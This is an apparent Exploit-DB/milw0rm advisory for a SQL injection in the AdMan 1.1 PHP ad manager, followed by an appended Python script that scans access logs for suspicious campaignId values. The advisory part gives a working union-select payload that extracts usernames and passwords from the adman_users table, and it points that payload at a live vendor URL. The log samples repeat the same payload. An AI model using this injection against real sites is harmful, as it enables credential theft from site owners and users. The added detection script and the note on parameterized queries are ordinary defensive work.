AdMan 1.1.20070907 - 'campaignId' SQL Injection

EDB-ID: 6702
Author: SuB-ZeRo
Type: webapps
Platform: PHP
Date: 2008-10-08

############### >>> Remote SQL Injection <<<  ###########
##    SuB-ZeRo(Walid)                                                              ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(algeria hackers)
 contact :  FbH@hotmail.com
                
 
 buy script : http://www.formfields.com/adManArea/adManPricing.php
dork    : find it
 exploit:
 www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 L!Ve DeMo  :::
 http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 Note: you must sign up and log in to the web site, and then you put in your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best friends :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
>>> all muslims

# milw0rm.com [2008-10-08]
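
A defender-side check for the request pattern above, as an added example that is not part of the original advisory or of AdMan's code: it scans web access log lines for requests to editCampaign.php whose campaignId is not a plain integer. The combined log format, the sample lines, and the rule that valid ids are non-negative decimal integers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client, request target and status from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate campaignId is a short non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_campaign_ids(target):
    """Return campaignId values in a request target that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/editcampaign.php"):
        return []
    # parse_qs decodes %xx and '+', so encoded variants are compared in decoded form.
    params = parse_qs(parts.query, keep_blank_values=True)
    values = [v for k, vs in params.items() if k.lower() == "campaignid" for v in vs]
    return [v for v in values if not VALID_ID.fullmatch(v)]


def triage(log_lines):
    """Return (client, status, bad_value) for every flagged request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        for bad in suspicious_campaign_ids(target):
            hits.append((client, status, bad))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """
203.0.113.7 - - [08/Oct/2008:10:00:01 +0000] "GET /advertiser/editCampaign.php?campaignId=12 HTTP/1.1" 200 5120
198.51.100.23 - - [08/Oct/2008:10:02:44 +0000] "GET /advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/* HTTP/1.1" 200 734
198.51.100.23 - - [08/Oct/2008:10:02:51 +0000] "GET /advertiser/editCampaign.php?campaignId=12%27 HTTP/1.1" 500 310
""".strip().splitlines()

if __name__ == "__main__":
    for client, status, value in triage(SAMPLE_LOG):
        print(f"{client} status={status} campaignId={value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query together with a parameterized statement, is what closes the hole; the log check only shows who has been probing it.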